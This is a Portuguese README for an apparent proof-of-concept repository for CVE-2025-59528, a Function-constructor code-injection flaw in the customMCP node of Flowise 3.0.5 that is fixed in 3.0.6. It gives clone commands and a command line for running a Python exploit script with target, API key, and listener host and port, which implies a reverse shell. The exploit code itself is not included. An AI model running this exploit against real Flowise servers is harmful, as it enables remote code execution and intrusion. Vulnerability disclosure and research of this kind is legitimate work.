
CVE-2025-59528 Prova de Conceito
Este repositório contém uma prova de conceito demonstrando CVE-2025-59528 no Flowise v3.0.5
A vulnerabilidade existe no nó customMCP, onde a entrada mcpServerConfig fornecida pelo usuário é processada de uma forma que leva à execução de código JavaScript por meio de avaliação insegura usando o construtor Function.
| Afetadas | Corrigida |
|---|
| 3.0.5 | 3.0.6 |
Um usuário autenticado pode ser capaz de executar JavaScript arbitrário no servidor, potencialmente levando à execução remota de código.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado pela ferramenta.